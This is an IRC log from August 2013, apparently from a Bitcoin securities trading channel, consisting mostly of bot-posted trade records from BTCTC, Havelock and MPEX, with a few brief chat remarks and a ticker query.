[HAVELOCK] [XBOND] 1 @ 0.00102999 BTC [-] Aug 08 01:09:48 [BTCTC] [LABCOIN] 1 @ 0.001387 BTC [-] Aug 08 01:09:49 [BTCTC] [LABCOIN] 40 @ 0.001372 = 0.0549 BTC [-] Aug 08 01:10:18 [BTCTC] [LABCOIN] 1 @ 0.001371 BTC [-] Aug 08 01:10:19 [BTCTC] [LABCOIN] 1070 @ 0.00137 = 1.4659 BTC [-] Aug 08 01:12:14 [BTCTC] [NASTY-PT] 17 @ 0.0045 = 0.0765 BTC [-] Aug 08 01:13:43 [BTCTC] [KENILWORTH] 5 @ 0.001799 = 0.009 BTC [+] Aug 08 01:14:38 [BTCTC] [LABCOIN] 2 @ 0.001371 = 0.0027 BTC [+] Aug 08 01:14:38 [BTCTC] [LABCOIN] 98 @ 0.00137 = 0.1343 BTC [-] Aug 08 01:14:44 [BTCTC] [ACTIVEMINING] 5 @ 0.005781 = 0.0289 BTC [+] Aug 08 01:15:07 [BTCTC] [S.BBET-PT] 5 @ 0.002 = 0.01 BTC [+] Aug 08 01:15:28 [BTCTC] [BTCGARDEN] 28 @ 0.016 = 0.448 BTC [+] Aug 08 01:16:53 [BTCTC] [TAT.ASICMINER] 14 @ 0.03775 = 0.5285 BTC [-] Aug 08 01:17:08 jurov you mean smidge ? Aug 08 01:17:39 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 08 01:19:08 [HAVELOCK] [AM100] 3 @ 0.038 = 0.114 BTC [-] Aug 08 01:22:47 [BTCTC] [ASICMINER-PT] 1 @ 3.921 BTC [+] Aug 08 01:22:59 oh... it's almost the same thing Aug 08 01:25:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.03773 BTC [-] Aug 08 01:27:52 [BTCTC] [DMS.PURCHASE] 1 @ 0.02828 BTC [-] Aug 08 01:29:33 [BTCTC] [TAT.ASICMINER] 67 @ 0.03773 = 2.5279 BTC [-] Aug 08 01:29:45 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Aug 08 01:29:56 [BTCTC] [ASICMINER-PT] 1 @ 3.827 BTC [-] Aug 08 01:29:56 [BTCTC] [ASICMINER-PT] 1 @ 3.826 BTC [-] Aug 08 01:30:08 [BTCTC] [TAT.ASICMINER] 50 @ 0.03774 = 1.887 BTC [+] Aug 08 01:32:42 [HAVELOCK] [XBOND] 19 @ 0.00102999 = 0.0196 BTC [-] Aug 08 01:33:18 [HAVELOCK] [XBOND] 38 @ 0.00103 = 0.0391 BTC [+] Aug 08 01:37:15 [BTCTC] [LABCOIN] 225 @ 0.00137 = 0.3083 BTC [-] Aug 08 01:38:23 lol Aug 08 01:38:44 anyway, some new kid. smart enough to have at least found this place, which i guess puts him ahead of 90% of the forum bankers. Aug 08 01:42:02 [BTCTC] [LABCOIN] 1439 @ 0.001389 = 1.9988 BTC [+] Aug 08 01:42:04 [BTCTC] [LABCOIN] 61 @ 0.00139 = 0.0848 BTC [+] Aug 08 01:44:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.0379 = 0.0758 BTC [+] Aug 08 01:45:08 [BTCTC] [BTCGARDEN] 13 @ 0.016 = 0.208 BTC [+] Aug 08 01:45:42 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1937 BTC [-] Aug 08 01:45:56 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1936 = 0.968 BTC [-] Aug 08 01:50:43 [HAVELOCK] [XBOND] 7 @ 0.00103 = 0.0072 BTC [+] Aug 08 01:52:47 [BTCTC] [PAJKA.BOND] 2 @ 0.0261 = 0.0522 BTC [+] Aug 08 01:53:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.0379 = 0.0758 BTC [+] Aug 08 01:53:21 [BTCTC] [COGNITIVE] 1 @ 0.3771 BTC [+] Aug 08 01:53:40 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 08 01:54:05 [BTCTC] [ACTIVEMINING] 6 @ 0.00577 = 0.0346 BTC [-] Aug 08 01:57:24 [BTCTC] [NASTY-PT] 50 @ 0.0045 = 0.225 BTC [-] Aug 08 01:57:48 [BTCTC] [TAT.ASICMINER] 21 @ 0.0379 = 0.7959 BTC [+] Aug 08 01:57:49 [BTCTC] [TAT.ASICMINER] 13 @ 0.038 = 0.494 BTC [+] Aug 08 01:58:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.038 = 0.114 BTC [+] Aug 08 02:00:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [+] Aug 08 02:01:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.03849 BTC [+] Aug 08 02:02:46 [MPEX] [S.MPOE] 3500 @ 0.00082844 = 2.8995 BTC [-] Aug 08 02:06:11 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 08 02:06:50 [BTCTC] [LABCOIN] 35 @ 0.001391 = 0.0487 BTC [+] Aug 08 02:07:45 [BTCTC] [LABCOIN] 50 @ 0.001371 = 0.0686 BTC [-] Aug 08 02:07:47 [BTCTC] [LABCOIN] 1738 @ 0.00137 = 2.3811 BTC [-] Aug 08 02:07:49 [BTCTC] [LABCOIN] 15 @ 0.001342 = 0.0201 BTC [-] Aug 08 02:07:50 [BTCTC] [LABCOIN] 40 @ 0.001341 = 0.0536 BTC [-] Aug 08 02:07:52 [BTCTC] [LABCOIN] 80 @ 0.00134 = 0.1072 BTC [-] Aug 08 02:07:54 [BTCTC] [LABCOIN] 625 @ 0.001338 = 0.8363 BTC [-] Aug 08 02:07:55 [BTCTC] [LABCOIN] 2452 @ 0.001337 = 3.2783 BTC [-] Aug 08 02:08:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.03847 = 0.1154 BTC [-] Aug 08 02:08:33 [HAVELOCK] [AM100] 1 @ 0.0384 BTC [+] Aug 08 02:09:08 [BTCTC] [ACTIVEMINING] 3 @ 0.00578 = 0.0173 BTC [+] Aug 08 02:09:15 [BTCTC] [BASIC-MINING] 9 @ 0.35 = 3.15 BTC [+] Aug 08 02:09:18 [BTCTC] [BASIC-MINING] 28 @ 0.34 = 9.52 BTC [-] Aug 08 02:09:20 [BTCTC] [BASIC-MINING] 2 @ 0.33 = 0.66 BTC [-] Aug 08 02:09:22 [HAVELOCK] [AM100] 2 @ 0.03845 = 0.0769 BTC [+] Aug 08 02:09:24 [BTCTC] [BASIC-MINING] 32 @ 0.32 = 10.24 BTC [-] Aug 08 02:09:29 [HAVELOCK] [AM100] 1 @ 0.0385 BTC [+] Aug 08 02:09:44 [HAVELOCK] [AM100] 2 @ 0.0387 = 0.0774 BTC [+] Aug 08 02:10:14 [BTCTC] [LABCOIN] 2 @ 0.001385 = 0.0028 BTC [+] Aug 08 02:10:39 [HAVELOCK] [VTX] 1 @ 0.51 BTC [+] Aug 08 02:10:42 [HAVELOCK] [VTX] 5 @ 0.511 = 2.555 BTC [+] Aug 08 02:10:43 [HAVELOCK] [VTX] 2 @ 0.515 = 1.03 BTC [+] Aug 08 02:10:45 [HAVELOCK] [VTX] 1 @ 0.52 BTC [+] Aug 08 02:10:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.03845 = 0.1154 BTC [-] Aug 08 02:11:59 [BTCTC] [LABCOIN] 10 @ 0.001349 = 0.0135 BTC [-] Aug 08 02:12:00 [BTCTC] [LABCOIN] 35 @ 0.001348 = 0.0472 BTC [-] Aug 08 02:12:02 [BTCTC] [LABCOIN] 1 @ 0.001341 BTC [-] Aug 08 02:12:04 [BTCTC] [LABCOIN] 318 @ 0.001338 = 0.4255 BTC [-] Aug 08 02:12:06 [BTCTC] [LABCOIN] 2548 @ 0.001337 = 3.4067 BTC [-] Aug 08 02:13:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0382 BTC [-] Aug 08 02:14:21 [BTCTC] [ACTIVEMINING] 10 @ 0.005775 = 0.0578 BTC [-] Aug 08 02:14:22 [BTCTC] [ACTIVEMINING] 3 @ 0.005776 = 0.0173 BTC [+] Aug 08 02:14:38 [BTCTC] [LABCOIN] 52 @ 0.00137 = 0.0712 BTC [+] Aug 08 02:15:41 [BTCTC] [LABCOIN] 52 @ 0.001339 = 0.0696 BTC [-] Aug 08 02:15:44 [BTCTC] [LABCOIN] 50 @ 0.001338 = 0.0669 BTC [-] Aug 08 02:15:56 [BTCTC] [DMS.PURCHASE] 3 @ 0.02816 = 0.0845 BTC [-] Aug 08 02:16:28 [BTCTC] [ACTIVEMINING] 10 @ 0.005785 = 0.0579 BTC [+] Aug 08 02:16:35 [BTCTC] [LABCOIN] 50 @ 0.001335 = 0.0668 BTC [-] Aug 08 02:18:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.0382 = 0.191 BTC [-] Aug 08 02:19:41 [BTCTC] [LABCOIN] 20 @ 0.001335 = 0.0267 BTC [-] Aug 08 02:19:58 [HAVELOCK] [AM100] 3 @ 0.03801 = 0.114 BTC [-] Aug 08 02:20:13 [MPEX] [S.MPOE] 1227 @ 0.00083196 = 1.0208 BTC [+] Aug 08 02:20:19 [BTCTC] [LABCOIN] 340 @ 0.001333 = 0.4532 BTC [-] Aug 08 02:20:50 [BTCTC] [ASICMINER-PT] 1 @ 3.896 BTC [+] **** BEGIN LOGGING AT Thu Aug 8 09:04:47 2013 Aug 08 09:06:52 [HAVELOCK] [SMG] 10 @ 0.000191 = 0.0019 BTC [-] Aug 08 09:06:55 [HAVELOCK] [SMG] 1000 @ 0.00019001 = 0.19 BTC [-] Aug 08 09:06:57 [HAVELOCK] [SMG] 13990 @ 0.00019 = 2.6581 BTC [-] Aug 08 09:10:18 !ticker mpex s.mg Aug 08 09:10:19 [MPEX:S.MG] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00024 / 0.00024906 / 0.0002525 (62501 shares, 15.57 BTC), 30D: 0.00013 / 0.00023026 / 0.0004 (2522466 shares, 580.83 BTC) Aug 08 09:13:15 [BTCTC] [LTC-ATF.B2] 10 @ 0.01043 = 0.1043 BTC [+] Aug 08 09:13:42 [HAVELOCK] [AM100] 4 @ 0.0387 = 0.1548 BTC [-] Aug 08 09:13:45 [HAVELOCK] [AM100] 103 @ 0.0385 = 3.9655 BTC [-] Aug 08 09:14:15 [HAVELOCK] [AM1] 1 @ 3.89969999 BTC [+] Aug 08 09:14:58 [BTCTC] [ASICMINER-PT] 1 @ 3.82 BTC [+] Aug 08 09:15:14 [BTCTC] [BTCGARDEN] 3 @ 0.01589 = 0.0477 BTC [-] Aug 08 09:15:16 [BTCTC] [BTCGARDEN] 47 @ 0.01589 = 0.7468 BTC [-] Aug 08 09:15:16 [BTCTC] [BTCGARDEN] 12 @ 0.01588 = 0.1906 BTC [-] Aug 08 09:15:18 [BTCTC] [BTCGARDEN] 6 @ 0.01581 = 0.0949 BTC [-] Aug 08 09:15:24 [BTCTC] [ACTIVEMINING] 2 @ 0.006273 = 0.0125 BTC [+] Aug 08 09:15:43 [BTCTC] [BITVPS] 1 @ 0.0019 BTC [-] Aug 08 09:15:56 [BTCTC] [ACTIVEMINING] 1 @ 0.006273 BTC [+] Aug 08 09:19:39 [BTCTC] [DMS.MINING] 4 @ 0.00599 = 0.024 BTC [-] Aug 08 09:20:42 [HAVELOCK] [AM100] 5 @ 0.03899999 = 0.195 BTC [+] Aug 08 09:23:06 [BTCTC] [LABCOIN] 25 @ 0.0014 = 0.035 BTC [+] Aug 08 09:23:50 [BTCTC] [BITVPS] 1 @ 0.002093 BTC [+] Aug 08 09:24:42 [BTCTC] [DMS.PURCHASE] 45 @ 0.02828 = 1.2726 BTC [+] Aug 08 09:30:28 [HAVELOCK] [SMG] 1500 @ 0.00019 = 0.285 BTC [-] Aug 08 09:31:32 [BTCTC] [ACTIVEMINING] 50 @ 0.006067 = 0.3034 BTC [-] Aug 08 09:31:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002392 BTC [+] Aug 08 09:32:22 [BTCTC] [ACTIVEMINING] 100 @ 0.006 = 0.6 BTC [-] Aug 08 09:36:09 [BTCTC] [COGNITIVE] 1 @ 0.35 BTC [-] Aug 08 09:39:08 [BTCTC] [BTCGARDEN] 87 @ 0.01602 = 1.3937 BTC [+] Aug 08 09:39:10 [BTCTC] [BTCGARDEN] 83 @ 0.01602 = 1.3297 BTC [+] Aug 08 09:43:17 [BTCTC] [ESECURITYSABTC] 1 @ 0.325 BTC [+] Aug 08 09:47:18 [BTCTC] [KENILWORTH] 2 @ 0.001799 = 0.0036 BTC [+] Aug 08 09:48:11 [BTCTC] [KENILWORTH] 52 @ 0.0018 = 0.0936 BTC [+] Aug 08 09:49:41 [HAVELOCK] [SDSTM] 11 @ 0.00629999 = 0.0693 BTC [+] Aug 08 09:50:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.03842 = 0.1537 BTC [+] Aug 08 09:50:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.0383 = 0.1915 BTC [-] Aug 08 09:50:15 [BTCTC] [DMS.MINING] 20 @ 0.00599 = 0.1198 BTC [-] Aug 08 09:50:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.0383 = 0.1149 BTC [-] Aug 08 09:50:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.03827 BTC [-] Aug 08 09:50:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.03827 = 0.1531 BTC [-] Aug 08 09:50:20 [BTCTC] [TAT.ASICMINER] 24 @ 0.03826 = 0.9182 BTC [-] Aug 08 09:50:21 [BTCTC] [TAT.ASICMINER] 59 @ 0.0382 = 2.2538 BTC [-] Aug 08 09:50:27 [BTCTC] [ASICMINER-PT] 1 @ 3.795 BTC [-] Aug 08 09:51:41 [BTCTC] [ASICMINER-PT] 1 @ 3.799 BTC [+] Aug 08 09:52:39 [BTCTC] [ASICMINER-PT] 1 @ 3.709 BTC [-] Aug 08 09:52:41 [BTCTC] [ASICMINER-PT] 3 @ 3.702 = 11.106 BTC [-] Aug 08 09:52:42 [BTCTC] [ASICMINER-PT] 1 @ 3.701 BTC [-] Aug 08 09:52:43 [BTCTC] [ASICMINER-PT] 10 @ 3.7 = 37 BTC [-] Aug 08 09:52:45 [BTCTC] [ASICMINER-PT] 1 @ 3.683 BTC [-] Aug 08 09:52:46 [BTCTC] [ASICMINER-PT] 1 @ 3.671 BTC [-] Aug 08 09:52:47 [BTCTC] [ASICMINER-PT] 4 @ 3.671 = 14.684 BTC [-] Aug 08 09:52:48 [BTCTC] [ASICMINER-PT] 19 @ 3.67 = 69.73 BTC [-] Aug 08 09:52:49 [BTCTC] [ASICMINER-PT] 1 @ 3.669 BTC [-] Aug 08 09:52:49 [HAVELOCK] [XBOND] 5 @ 0.0010455 = 0.0052 BTC [-] Aug 08 09:52:51 [BTCTC] [ASICMINER-PT] 1 @ 3.664 BTC [-] Aug 08 09:52:52 [HAVELOCK] [XBOND] 4 @ 0.00104667 = 0.0042 BTC [+] Aug 08 09:52:54 [BTCTC] [ASICMINER-PT] 1 @ 3.663 BTC [-] Aug 08 09:52:55 [BTCTC] [ASICMINER-PT] 1 @ 3.662 BTC [-] Aug 08 09:52:56 [HAVELOCK] [XBOND] 11 @ 0.00104668 = 0.0115 BTC [+] Aug 08 09:52:59 [BTCTC] [ASICMINER-PT] 2 @ 3.651 = 7.302 BTC [-] Aug 08 09:53:00 [BTCTC] [ASICMINER-PT] 2 @ 3.65 = 7.3 BTC [-] Aug 08 09:53:41 [HAVELOCK] [XBOND] 5 @ 0.00104668 = 0.0052 BTC [+] Aug 08 09:54:10 [BTCTC] [TAT.VIRTUALMINE] 64 @ 0.002392 = 0.1531 BTC [+] Aug 08 09:54:45 [BTCTC] [LABCOIN] 50 @ 0.001421 = 0.0711 BTC [+] Aug 08 09:54:46 [BTCTC] [LABCOIN] 35 @ 0.001422 = 0.0498 BTC [+] Aug 08 09:54:47 [BTCTC] [LABCOIN] 1 @ 0.001429 BTC [+] Aug 08 09:54:48 [BTCTC] [LABCOIN] 12 @ 0.001429 = 0.0171 BTC [+] Aug 08 09:54:50 [BTCTC] [LABCOIN] 650 @ 0.00143 = 0.9295 BTC [+] Aug 08 09:54:51 [BTCTC] [LABCOIN] 240 @ 0.001431 = 0.3434 BTC [+] Aug 08 09:54:52 [BTCTC] [LABCOIN] 122 @ 0.001432 = 0.1747 BTC [+] Aug 08 09:54:53 [BTCTC] [LABCOIN] 980 @ 0.001433 = 1.4043 BTC [+] Aug 08 09:54:54 [BTCTC] [LABCOIN] 62 @ 0.001434 = 0.0889 BTC [+] Aug 08 09:54:55 [BTCTC] [LABCOIN] 500 @ 0.001435 = 0.7175 BTC [+] Aug 08 09:54:56 [BTCTC] [LABCOIN] 118 @ 0.001444 = 0.1704 BTC [+] Aug 08 09:54:57 [BTCTC] [LABCOIN] 500 @ 0.001445 = 0.7225 BTC [+] Aug 08 09:54:57 [BTCTC] [LABCOIN] 450 @ 0.001446 = 0.6507 BTC [+] Aug 08 09:54:58 [BTCTC] [LABCOIN] 218 @ 0.001447 = 0.3154 BTC [+] Aug 08 09:54:59 [BTCTC] [LABCOIN] 1745 @ 0.001448 = 2.5268 BTC [+] Aug 08 09:55:00 [BTCTC] [LABCOIN] 500 @ 0.00145 = 0.725 BTC [+] Aug 08 09:55:01 [BTCTC] [LABCOIN] 1120 @ 0.001451 = 1.6251 BTC [+] Aug 08 09:55:56 [BTCTC] [BTCGARDEN] 28 @ 0.01602 = 0.4486 BTC [+] Aug 08 09:55:57 [BTCTC] [BTCGARDEN] 23 @ 0.01602 = 0.3685 BTC [+] Aug 08 09:55:59 [BTCTC] [BTCGARDEN] 449 @ 0.01603 = 7.1975 BTC [+] Aug 08 10:00:29 [BTCTC] [TAT.ASICMINER] 19 @ 0.0382 = 0.7258 BTC [-] Aug 08 10:00:31 [BTCTC] [TAT.ASICMINER] 37 @ 0.03818 = 1.4127 BTC [-] Aug 08 10:00:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.038 = 0.19 BTC [-] Aug 08 10:00:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [-] Aug 08 10:00:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.038 = 0.19 BTC [-] Aug 08 10:00:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.03724 = 0.1117 BTC [-] Aug 08 10:00:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.03723 = 0.3723 BTC [-] Aug 08 10:00:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.03723 = 0.1862 BTC [-] Aug 08 10:00:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.03722 BTC [-] Aug 08 10:00:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.03721 = 0.1861 BTC [-] Aug 08 10:00:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.0372 = 0.1488 BTC [-] Aug 08 10:00:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.03714 BTC [-] Aug 08 10:00:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.03713 = 0.1114 BTC [-] Aug 08 10:00:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.03713 BTC [-] Aug 08 10:00:44 [BTCTC] [ASICMINER-PT] 1 @ 3.736 BTC [+] Aug 08 10:02:40 [BTCTC] [ASICMINER-PT] 1 @ 3.653 BTC [-] Aug 08 10:02:42 [BTCTC] [ASICMINER-PT] 5 @ 3.652 = 18.26 BTC [-] Aug 08 10:02:43 [BTCTC] [ASICMINER-PT] 1 @ 3.651 BTC [-] Aug 08 10:02:44 [BTCTC] [ASICMINER-PT] 1 @ 3.65 BTC [-] Aug 08 10:02:45 [BTCTC] [ASICMINER-PT] 5 @ 3.62 = 18.1 BTC [-] Aug 08 10:03:46 [BTCTC] [ASICMINER-PT] 1 @ 3.616 BTC [-] Aug 08 10:03:48 [BTCTC] [ASICMINER-PT] 5 @ 3.615 = 18.075 BTC [-] Aug 08 10:04:43 [BTCTC] [ASICMINER-PT] 1 @ 3.612 BTC [-] Aug 08 10:04:45 [BTCTC] [ASICMINER-PT] 1 @ 3.611 BTC [-] Aug 08 10:04:46 [BTCTC] [ASICMINER-PT] 2 @ 3.611 = 7.222 BTC [-] Aug 08 10:04:47 [BTCTC] [ASICMINER-PT] 1 @ 3.611 BTC [-] Aug 08 10:04:49 [BTCTC] [ASICMINER-PT] 15 @ 3.61 = 54.15 BTC [-] Aug 08 10:04:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0372 = 0.0744 BTC [+] Aug 08 10:04:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.03713 = 0.0743 BTC [-] Aug 08 10:04:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.03704 BTC [-] Aug 08 10:04:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.03702 = 0.2221 BTC [-] Aug 08 10:04:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.03701 = 0.3701 BTC [-] Aug 08 10:04:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.03701 = 0.111 BTC [-] Aug 08 10:04:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [-] Aug 08 10:04:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.037 = 0.296 BTC [-] Aug 08 10:04:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.037 = 0.259 BTC [-] Aug 08 10:05:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.037 = 0.185 BTC [-] Aug 08 10:05:01 [BTCTC] [ASICMINER-PT] 2 @ 3.61 = 7.22 BTC [-] Aug 08 10:05:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.03681 BTC [-] Aug 08 10:05:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.0368 = 0.1104 BTC [-] Aug 08 10:05:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.0368 = 0.0736 BTC [-] Aug 08 10:05:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.03671 BTC [-] Aug 08 10:05:07 [BTCTC] [TAT.ASICMINER] 9 @ 0.0367 = 0.3303 BTC [-] Aug 08 10:05:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.03662 BTC [-] Aug 08 10:05:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.03661 = 0.1098 BTC [-] Aug 08 10:05:09 [BTCTC] [TAT.ASICMINER] 7 @ 0.03652 = 0.2556 BTC [-] Aug 08 10:05:10 [BTCTC] [TAT.ASICMINER] 28 @ 0.03651 = 1.0223 BTC [-] Aug 08 10:05:18 [BTCTC] [LABCOIN] 50 @ 0.001439 = 0.072 BTC [-] Aug 08 10:05:19 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [+] Aug 08 10:05:20 [BTCTC] [LABCOIN] 235 @ 0.00144 = 0.3384 BTC [+] Aug 08 10:06:40 [BTCTC] [ASICMINER-PT] 2 @ 3.61 = 7.22 BTC [-] Aug 08 10:06:41 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 08 10:06:43 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [-] Aug 08 10:06:53 [BTCTC] [LABCOIN] 1395 @ 0.001442 = 2.0116 BTC [+] Aug 08 10:07:11 [BTCTC] [BTCGARDEN] 7 @ 0.01602 = 0.1121 BTC [-] Aug 08 10:08:44 [BTCTC] [LABCOIN] 50 @ 0.001443 = 0.0722 BTC [+] Aug 08 10:08:54 [HAVELOCK] [LABCO] 16 @ 0.001342 = 0.0215 BTC [-] Aug 08 10:12:04 [BTCTC] [ASICMINER-PT] 1 @ 3.597 BTC [-] Aug 08 10:15:26 [BTCTC] [BASIC-MINING] 1 @ 0.327 BTC [-] Aug 08 10:16:01 [BTCTC] [ASICMINER-PT] 1 @ 3.599 BTC [+] Aug 08 10:16:02 [BTCTC] [ASICMINER-PT] 11 @ 3.6 = 39.6 BTC [+] Aug 08 10:16:57 [HAVELOCK] [AM1] 1 @ 3.89 BTC [-] Aug 08 10:17:32 [BTCTC] [BTCGARDEN] 1 @ 0.01602 BTC [-] Aug 08 10:18:08 [BTCTC] [ACTIVEMINING] 1 @ 0.006019 BTC [+] Aug 08 10:21:20 [BTCTC] [ASICMINER-PT] 1 @ 3.612 BTC [+] Aug 08 10:23:15 [BTCTC] [ASICMINER-PT] 3 @ 3.614 = 10.842 BTC [+] Aug 08 10:24:06 [BTCTC] [ASICMINER-PT] 1 @ 3.613 BTC [-] Aug 08 10:24:44 [BTCTC] [BTCGARDEN] 29 @ 0.016 = 0.464 BTC [-] Aug 08 10:24:46 [BTCTC] [ASICMINER-PT] 1 @ 3.552 BTC [-] Aug 08 10:24:47 [BTCTC] [ASICMINER-PT] 3 @ 3.551 = 10.653 BTC [-] Aug 08 10:24:48 [BTCTC] [ASICMINER-PT] 4 @ 3.55 = 14.2 BTC [-] Aug 08 10:30:20 [BTCTC] [BASIC-MINING] 1 @ 0.3261 BTC [-] Aug 08 10:30:22 [BTCTC] [BASIC-MINING] 3 @ 0.3262 = 0.9786 BTC [+] Aug 08 10:30:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.03662 BTC [+] Aug 08 10:30:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.03662 BTC [+] Aug 08 10:30:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.03661 = 0.2929 BTC [-] Aug 08 10:30:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.03654 = 0.2558 BTC [-] Aug 08 10:30:49 [BTCTC] [TAT.ASICMINER] 36 @ 0.03653 = 1.3151 BTC [-] Aug 08 10:30:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.03652 = 0.1461 BTC [-] Aug 08 10:30:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.03651 = 0.3651 BTC [-] Aug 08 10:30:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0365 BTC [-] Aug 08 10:30:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.0365 = 0.365 BTC [-] Aug 08 10:30:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.03631 BTC [-] Aug 08 10:30:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.0363 = 0.1815 BTC [-] Aug 08 10:30:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0363 = 0.0726 BTC [-] Aug 08 10:30:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.03622 BTC [-] Aug 08 10:30:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.03611 = 0.325 BTC [-] Aug 08 10:30:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.0361 = 0.1444 BTC [-] Aug 08 10:32:05 [BTCTC] [BTCGARDEN] 192 @ 0.01599 = 3.0701 BTC [-] Aug 08 10:32:06 [BTCTC] [BTCGARDEN] 808 @ 0.016 = 12.928 BTC [+] Aug 08 10:32:07 [BTCTC] [ASICMINER-PT] 1 @ 3.611 BTC [+] Aug 08 10:41:35 [HAVELOCK] [XBOND] 11 @ 0.00104668 = 0.0115 BTC [+] Aug 08 10:41:48 [BTCTC] [LABCOIN] 50 @ 0.001423 = 0.0712 BTC [-] Aug 08 10:41:50 [BTCTC] [LABCOIN] 185 @ 0.001422 = 0.2631 BTC [-] Aug 08 10:42:07 [BTCTC] [LABCOIN] 50 @ 0.001424 = 0.0712 BTC [+] Aug 08 10:42:35 [BTCTC] [LABCOIN] 51 @ 0.001426 = 0.0727 BTC [+] Aug 08 10:42:36 [BTCTC] [LABCOIN] 50 @ 0.001425 = 0.0713 BTC [-] Aug 08 10:44:40 [BTCTC] [LABCOIN] 50 @ 0.00144 = 0.072 BTC [+] Aug 08 10:44:41 [BTCTC] [LABCOIN] 235 @ 0.001441 = 0.3386 BTC [+] Aug 08 10:44:42 [BTCTC] [LABCOIN] 150 @ 0.001452 = 0.2178 BTC [+] Aug 08 10:44:43 [BTCTC] [LABCOIN] 720 @ 0.001454 = 1.0469 BTC [+] Aug 08 10:44:45 [BTCTC] [LABCOIN] 635 @ 0.001455 = 0.9239 BTC [+] Aug 08 10:44:46 [BTCTC] [LABCOIN] 300 @ 0.001456 = 0.4368 BTC [+] Aug 08 10:44:46 [BTCTC] [LABCOIN] 280 @ 0.001456 = 0.4077 BTC [+] Aug 08 10:44:47 [BTCTC] [LABCOIN] 1000 @ 0.001479 = 1.479 BTC [+] Aug 08 10:44:48 [BTCTC] [LABCOIN] 1110 @ 0.00148 = 1.6428 BTC [+] Aug 08 10:44:49 [BTCTC] [LABCOIN] 2245 @ 0.00148 = 3.3226 BTC [+] Aug 08 10:46:28 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [+] Aug 08 10:50:55 [BTCTC] [LABCOIN] 50 @ 0.001425 = 0.0713 BTC [-] Aug 08 10:50:56 [BTCTC] [LABCOIN] 235 @ 0.001424 = 0.3346 BTC [-] Aug 08 10:53:56 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [+] Aug 08 10:54:05 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [+] Aug 08 10:54:16 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [+] Aug 08 10:55:45 [BTCTC] [BASIC-MINING] 1 @ 0.3197 BTC [-] Aug 08 10:56:45 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [+] Aug 08 10:57:07 [BTCTC] [ASICMINER-PT] 2 @ 3.615 = 7.23 BTC [+] Aug 08 11:00:50 [BTCTC] [LABCOIN] 235 @ 0.001446 = 0.3398 BTC [+] Aug 08 11:00:50 [BTCTC] [LABCOIN] 500 @ 0.00145 = 0.725 BTC [+] Aug 08 11:00:52 [BTCTC] [LABCOIN] 50 @ 0.00145 = 0.0725 BTC [+] Aug 08 11:01:41 [BTCTC] [ASICMINER-PT] 5 @ 3.615 = 18.075 BTC [+] Aug 08 11:03:54 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] 